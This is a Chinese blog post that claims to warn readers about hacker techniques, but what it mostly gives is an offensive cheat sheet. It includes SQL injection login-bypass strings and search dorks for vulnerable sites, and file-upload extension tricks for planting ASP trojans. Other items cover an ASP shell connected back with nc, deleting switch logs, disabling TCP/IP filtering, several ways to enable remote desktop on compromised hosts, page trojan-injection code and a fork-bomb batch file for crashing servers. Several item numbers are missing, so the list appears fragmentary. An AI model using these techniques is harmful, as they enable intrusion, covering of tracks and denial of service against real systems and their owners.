冷弦博月

        现在网上的攻击事件越来越多，黑客都是通过什么方法来攻击我们的呢？下面我们给大家总结了黑客入侵网络的五十种方法，让大家做到有备无患。本文只是提醒帮助广大网友防范黑客攻击，非鼓励性文章，希望不要利用黑客技术做违法事情。
1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络
2.搜索栏里输入
关键字%'and 1=1 and '%'='
关键字%'and 1=2 and '%'='
比较不同处 可以作为注入的特征字符
3.登陆框用户名和密码输入'or'='or' 漏洞很老但是现在很是遍地都是
4.我们先到www.google.com底下搜索一下co net mib ver 1.0
密码帐号都是 'or'='or'
5.挂马代码
6.upload/2010/1/201001061203036555.jpg，那么我们要是把文件改成：ating.jpg.asp试试。。由于还是asp结尾，所以木马不会变~
18.sql注入时工具---internet选项---高级里找到显示友好的错误信息勾去掉
不能注入时要第一时间想到%5c暴库
19.这个dbinbd.asp文件插入后门的功能适用于文件名为.asp的所有access数据库不是动网论坛也一样可以使用的,后门隐蔽，几乎发现不了
工具使用方法动画和所有文件
upload/2010/1/201001061203216348.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
35.telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的ip
然后用#clear logg和#clear line vty *删除日志
36.搜索关键字:"copyright 2003-2004 动易网络" 后面地址改成upfile_soft.asp 这样的漏洞很多
37.bbsxp的漏洞总结 powered by bbsxp 5.15/licence blog.asp中的对id 的过滤不严的漏洞 拿到管理员的前后台密码 工具：bbsxp完全版 cookies 欺骗 bbsxp 过滤了 asp 文件的上传 所以我们这里用 asa 来传马
39.电脑坏了省去重新安装系统的方法
纯dos下执行，
xp:copy c:\windows\repair\*.* 到c:\windows\system32\config
2k: copy c:\winnt\repair\*.* 到c:\winnt\system32\config
40.一般人设置啊拉qq大盗的时候发信和收信都是同一个信箱，因此当我的机子中了此木马后没有立即杀掉进程，而是用内存编辑工具打开它的进程，查找smtp字样，就会找到它的信箱和密码了。只对1.5以前的管用.
41.内网控制内网 用vidc 还要有一只肉鸡
42.有许多管理员用备份的日期做备份数据库的名字
比如http://www.hack6.com/bbs/databackup/20050601.mdb
43.动网数据库oldusername=%b5%f0%b7%c0&username2=%b5%f0%b7%c0&password2=19841202&adduser=%b5%f0%b7%c0&id=12&submit=%b8%fc+%d0%c2
不知道用户名(不是%b8%f0%b7%c0) 转化这个用他本身的页面
http://www.hack6.com/bbs/showerr.asp?boardid=0&errcodes=10,11&action=%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2
%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2这句话意思是“填写登录信息”
那么就把%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2换成%b5%f0%b7%c0 可以看到用户名
44.对付信息监控系统 木马必须是加密的 如net user用不了就用net1 user等等 我是大连的 大连这边主机用这方法好用 可以直接传加密的马 用用黑基tyrant的方法 上传一个cmd的aspshall 用nc连接自己的nc监听端口 在web目录下写个加ftp用户的txt 本地43958用nc提交 ftp到服务器加用户
       45.解决tcp/ip筛选 在注册表里有三处，分别是： 
       hkey_local_machine\system\controlset001\services\tcpip
hkey_local_machine\system\controlset002\services\tcpip
hkey_local_machine\system\currentcontrolset\services\tcpip
分别用
regedit -e d:\a.reg hkey_local_machine\system\currentcontrolset\services\tcpip
regedit -e d:\b.reg hkey_local_machine\system\controlset002\services\tcpip
regedit -e d:\c.reg hkey_local_machine\system\currentcontrolset\services\tcpip
命令来导出注册表项
然后把三个文件里的enablesecurityfilters"=dword:00000001，
改成enablesecurityfilters"=dword:00000000 再将以上三个文件分别用
regedit -s d:\a.reg regedit -s d:\b.reg regedit -s d:\c.reg 导入注册表即可
46.使chm木马无法在本地运行木马程序 将注册表"hkey_current_u
ser\software\microsoft\windows\currentversion\internet settings\zones\0"下的1004项的值由原来十进制的0改为十六进制的3。
47.开3389的5种方法
(1)打开记事本，编辑内容如下：
echo [components] > c:\sql
echo tsenable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
编辑好后存为bat文件，上传至肉鸡，执行。
(2) (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
下载地址:www.netsill.com/rots.zip
在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本，例如：
c:\>cscript rots.vbs <目标ip> <用户名> <密码> [服务端口] [/r]
如果要对本地使用，ip地址为127.0.0.1或者一个点(用.表示)，用户名和密码都为空(用 ""表示)。
(3)djshao正式版5.0
解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyx*.**e上传到肉鸡的c:\winnt\temp下，然后 进入c:\winnt\temp目录执行djxyx*.**e解压缩文件，然后再执行解压缩出来的azzd.exe文件，等一会肉鸡 会自动重启!重启后会出现终端服务
(4)下载dameware nt utilities 3.66.0.0 注册版
地址www.netsill.com/dwmrcw36600.zip
安装注册完毕后输入对方ip用户名密码，等待出现是否安装的对话框点是。
复制启动后出现对方桌面。
在对方桌面进入控制面版，点添加或删除程序。进入后点添加/删除windows组件，找到终端服务，点际进入 后在启动终端服务上打上勾。确定自动提示重起，重起后ok
(5)大家最常用的 3389.exe 下载地址www.hack6.com 把程序上传到肉鸡运行后重启既可
48.qq上得到别人的ip
一般跟别人聊天 如果是对方先对你说话 那么她的ip显示出来的概率就大
当然如果是我们找对方 可以先跟她说发过去消息之后 然后关闭窗口等待她的回复
还可以用天网防火墙选择上udp数据保检测,即可拦截到对方ip
49.挂马js代码document.write('');保存到js页面里 可让所有页面挂马
50.让服务器重启
写个bat死循环:
@echo off
:loop1
cls
start cmd.exe
goto loop1
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启

原创文章请注明转载自冷弦博月，本文地址：http://www.lengxian.org/web/fangfanheike.html

【已有0位网友发表了看法,你呢？】